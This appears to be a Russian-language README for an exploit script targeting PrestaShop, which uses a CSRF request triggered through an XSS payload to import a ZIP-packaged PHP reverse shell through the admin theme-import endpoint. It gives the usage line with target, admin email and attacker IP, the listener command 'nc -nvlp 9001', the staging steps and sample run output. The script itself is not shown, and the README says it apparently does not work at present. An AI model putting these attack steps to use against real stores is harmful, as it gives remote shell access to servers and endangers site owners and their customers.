
Автоматизированный скрипт эксплуатации CSRF для PrestaShop, который загружает и выполняет PHP reverse shell через специально сформированную ZIP-нагрузку, требующий слушатель Netcat для захвата соединения.
Этот сценарий автоматизирует эксплойт CSRF (межсайтовая подделка запроса) для загрузки обратной оболочки PHP на веб-сервер цели и её выполнения. Обратная оболочка доставляется в виде ZIP-файла через специально созданную CSRF-нагрузку, которая срабатывает, когда привилегированный пользователь взаимодействует с определённой конечной точкой. Сценарию требуется работающий экземпляр Netcat для захвата соединения обратной оболочки.
Похоже, сейчас не работает, будет обновлено позже
./exploit.sh <target_url> <admin_endpoint> <admin_email> <attacker_ip>
target_url: Базовый URL цели (например, https://example.com).admin_endpoint: Путь к конечной точке импорта темы администратора.admin_email: Адрес электронной почты администратора (для подделки в нагрузке).attacker_ip: IP-адрес, где слушатель обратной оболочки будет принимать соединение../exploit.sh https://victim.com /admin-panel [email protected] 192.168.1.10
attacker_ip и порт 9001.love.php) сжимается в Love-exploit.zip.csrf_payload.html), содержащую JavaScript-скрипт для автоматической отправки вредоносного запроса в панель администратора цели для импорта обратной оболочки.8000 раздаёт Love-exploit.zip для импорта целью.Запустите слушатель Netcat на вашей машине:
nc -nvlp 9001
Запустите скрипт:
./exploit.sh https://victim.com /admin-panel [email protected] 192.168.1.10
Дождитесь, пока цель выполнит CSRF-нагрузку, и получите соединение обратной оболочки.
Скрипт выводит следующую информацию во время выполнения:
8000 (HTTP-сервер) и 9001 (слушатель Netcat) свободны перед запуском скрипта.[*] Ensure Netcat is listening: nc -nvlp 9001
[*] Awaiting netcat listener...
[*] Creating PHP reverse shell...
[*] Packaging shell as Love-exploit.zip...
[*] Fetching CSRF token...
[+] CSRF token retrieved: <token_value>
[*] Building HTML payload for CSRF...
[*] Converting HTML to PNG...
[*] Checking for existing HTTP server on port 8000...
[*] Starting new HTTP server on port 8000 for payload delivery...
[*] Uploading XSS payload to trigger CSRF...
[*] Keeping script running to monitor for incoming connections...
Этот документ предназначен для использования тестировщиками на проникновение и исследователями кибербезопасности в контролируемых средах. Неправильное использование этого инструмента в несанкционированных целях строго запрещено.
Этот скрипт предназначен только для образовательных целей и законных оценок кибербезопасности. Несанкционированное использование против системы без разрешения незаконно и противоречит этическим нормам.